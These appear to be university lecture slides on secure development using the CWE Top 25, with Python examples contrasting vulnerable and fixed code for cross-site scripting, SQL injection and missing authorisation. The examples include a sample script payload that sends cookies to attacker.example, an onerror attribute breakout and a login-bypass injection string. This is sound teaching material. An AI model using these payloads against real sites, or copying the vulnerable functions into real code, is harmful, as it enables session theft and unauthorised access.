
1 Secure Software Development. Mini Zeng, University of Alabama in Huntsville

2 Outline
 Introduction
 Sample project: ShareAlbum
 Step by step instructions
 Errors and mitigations
 Discussion

3 Introduction
The Common Weakness Enumeration (CWE) provides a unified, measurable set of software weaknesses. The 2011 CWE/SANS Top 25 Most Dangerous Software Errors is a list of the most widespread and critical errors that can lead to serious vulnerabilities in software.

4 Step by step instructions: STEP 1
STEP 1: Go through the CWE website and identify the potential software errors that exist in the program, using the brief list of the Top 25 Most Dangerous Software Errors as a checklist. An automated static analysis tool such as RIPS can be used to establish a raw error list (RIPS analyses PHP source, so the tool has to match the project's language). Errors identified in this way:
CWE-79: Cross-site Scripting
CWE-89: SQL Injection
CWE-862: Missing Authorization
CWE-798: Use of Hard-coded Credentials
CWE-311: Missing Encryption of Sensitive Data
CWE-434: Unrestricted Upload of File with Dangerous Type
CWE-22: Path Traversal
CWE-759: Use of a One-Way Hash without a Salt
CWE-327: Use of a Broken or Risky Cryptographic Algorithm

5 Step by Step Instructions: STEP 2
STEP 2: For each error, check its summary in the Top 25 list and prioritise the errors that have high Attacker Awareness, an Attack Frequency of "often", and a low or medium Remediation Cost, i.e. the ones that are both likely to be attacked and cheap to fix up front.

6 Step by Step Instructions: Example

7 Step by Step Instructions: STEP 3
STEP 3: Read the Technical Details section of each error and select the list of errors to mitigate. Check the Applicable Platforms part to find out whether the error applies to your application (its language and platform). Check the code examples in the technical details; they are often helpful.
STEP 4: Decide on a mitigation approach for each selected error, document the list of errors to fix, and go through all of your project code to mitigate them.

8 Errors and Mitigations: CWE-79
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'). If you are not careful, attackers can inject JavaScript or other browser-executable script into your web page; it then runs in the browser of every user who views that page, with that user's session. Mitigation: encode all untrusted data at output time, using the encoding that matches the HTML context it is written into (element body, attribute, URL or script).
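The slides do not show the project's code, so the following is an added example, not code from the slides or from ShareAlbum. It renders an album comment and an image alt attribute first the vulnerable way and then with output encoding; the two payload strings and all function names are constructed for the illustration (Python is used here for illustration; the project's own language is not stated on the slides).

```python
import html

# Constructed sample input: a comment an attacker posts under a shared photo.
SCRIPT_PAYLOAD = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'
# Constructed album name that tries to break out of a quoted HTML attribute.
ATTR_PAYLOAD = 'vacation" onerror="alert(document.domain)'


def render_comment_vulnerable(comment: str) -> str:
    """CWE-79: untrusted text is concatenated straight into the page body."""
    return '<div class="comment">' + comment + "</div>"


def render_comment_fixed(comment: str) -> str:
    """Mitigation: HTML-encode untrusted text at the point it is written into
    the body of an element, so <, > and & lose their markup meaning."""
    return '<div class="comment">' + html.escape(comment, quote=True) + "</div>"


def render_alt_vulnerable(album_name: str) -> str:
    """CWE-79 in an attribute context: a stray quote ends the attribute and
    whatever follows becomes a new attribute (here an onerror handler)."""
    return '<img src="/thumb/1.jpg" alt="' + album_name + '">'


def render_alt_fixed(album_name: str) -> str:
    """Attribute context: always quote the attribute AND encode quotes inside
    it (html.escape with quote=True turns " into &quot; and ' into &#x27;)."""
    return '<img src="/thumb/1.jpg" alt="' + html.escape(album_name, quote=True) + '">'


def has_live_script_tag(markup: str) -> bool:
    """Check used here to show whether a raw <script> element survived."""
    return "<script" in markup.lower()


def has_injected_handler(markup: str) -> bool:
    """Check used here to show whether an unencoded onerror= attribute got in."""
    return ' onerror="' in markup


if __name__ == "__main__":
    print(render_comment_vulnerable(SCRIPT_PAYLOAD))
    print(render_comment_fixed(SCRIPT_PAYLOAD))
    print(render_alt_vulnerable(ATTR_PAYLOAD))
    print(render_alt_fixed(ATTR_PAYLOAD))
```

The encoded comment still displays the attacker's text verbatim to other users, but as text rather than as a script element; the attribute case shows why escaping `<` and `>` alone is not enough when the data lands inside a quoted attribute.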

9 Errors and Mitigations: CWE-89
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'). If attackers can influence the SQL that you use to communicate with your database, then suddenly all your fun and profit belongs to them. Mitigation: build every query with prepared statements and bound parameters, never by concatenating user input into the SQL text.
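As an added example (not code from the slides or from ShareAlbum), a login query written with string formatting and then with a bound parameter, run against a constructed in-memory SQLite table. The table contents, the injected user name and the function names are all made up for the illustration.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table standing in for the album database.
    Passwords are kept in clear text only to keep the query example short;
    storing them that way is a separate weakness (CWE-759 / CWE-327)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (name, password) VALUES (?, ?)",
                     [("alice", "correct horse"), ("bob", "battery staple")])
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, name: str, password: str) -> bool:
    """CWE-89: user input is pasted into the SQL text, so quote characters and
    comment markers in the input change the meaning of the query."""
    sql = "SELECT id FROM users WHERE name = '%s' AND password = '%s'" % (name, password)
    return conn.execute(sql).fetchone() is not None


def login_fixed(conn: sqlite3.Connection, name: str, password: str) -> bool:
    """Mitigation: a parameterised query. The SQL text is fixed; the driver
    passes the values separately, so they can never be parsed as SQL."""
    sql = "SELECT id FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchone() is not None


def search_fixed(conn: sqlite3.Connection, term: str) -> list:
    """Parameters also work inside LIKE patterns: the wildcard is added to the
    bound value, not to the SQL string. A user-supplied % or _ only widens the
    match; it cannot inject SQL."""
    rows = conn.execute("SELECT name FROM users WHERE name LIKE ?", ("%" + term + "%",))
    return [r[0] for r in rows.fetchall()]


# Constructed attacker input: the SQL comment marker drops the password check,
# turning the query into ... WHERE name = 'alice' --' AND password = '...'
INJECTION_NAME = "alice' --"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable login, injected name, wrong password:", login_vulnerable(db, INJECTION_NAME, "wrong"))
    print("fixed login, injected name, wrong password:     ", login_fixed(db, INJECTION_NAME, "wrong"))
    print("fixed login, real credentials:                  ", login_fixed(db, "alice", "correct horse"))
```

With the parameterised version the same input is simply compared as a user name that does not exist, so the login fails as it should.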

10 Errors and Mitigations: CWE-862
CWE-862 Missing Authorization. Users are assigned different privileges, but the program does not check that the (already authenticated) user is actually authorized to perform the requested action on the requested object. Authentication answers who the user is; authorization is the separate check that this user may do this. Mitigation: enforce the check on the server for every request, not only by hiding links in the user interface.
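An added example (not from the slides or from ShareAlbum) of an album deletion handler that trusts the session alone, beside one that checks ownership or an admin role before acting. The users, albums, roles and function names are constructed for the illustration.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    id: int
    role: str  # constructed roles: "user" or "admin"


@dataclass(frozen=True)
class Album:
    id: int
    owner_id: int
    name: str


def sample_albums() -> dict:
    """Constructed album store: two users, one album each."""
    return {1: Album(1, 100, "alice-vacation"), 2: Album(2, 200, "bob-family")}


def delete_album_vulnerable(store: dict, current_user: User, album_id: int) -> str:
    """CWE-862: the caller is authenticated (we know who current_user is), but
    nothing checks that this user may delete *this* album, so any logged-in
    user can delete any album just by supplying its id in the request."""
    if album_id not in store:
        return "not_found"
    del store[album_id]
    return "deleted"


def delete_album_fixed(store: dict, current_user: User, album_id: int) -> str:
    """Mitigation: decide authorisation on the server, per request, against the
    object being acted on, before performing the action. Hiding the delete
    button in the UI is not a control; the request can be sent by hand."""
    album = store.get(album_id)
    if album is None:
        return "not_found"
    if current_user.role != "admin" and album.owner_id != current_user.id:
        # The web layer would answer 403 here. Some applications return
        # "not_found" instead so that ids of other users' albums are not
        # confirmed to exist; either way the deletion must not happen.
        return "forbidden"
    del store[album_id]
    return "deleted"


if __name__ == "__main__":
    bob = User(id=200, role="user")
    # Bob tries to delete Alice's album (id 1).
    print("vulnerable:", delete_album_vulnerable(sample_albums(), bob, 1))
    print("fixed:     ", delete_album_fixed(sample_albums(), bob, 1))
```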

11 Discussions
 CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal').
 CWE-434: Unrestricted Upload of File with Dangerous Type.
 CWE-311: Missing Encryption of Sensitive Data.
 CWE-798: Use of Hard-coded Credentials. Hard-coding credentials may be convenient while coding, but anyone who obtains the source (or the deployed binary) then has them, and they cannot be changed without a new release.
 CWE-759: Use of a One-Way Hash without a Salt.
 CWE-327: Use of a Broken or Risky Cryptographic Algorithm.


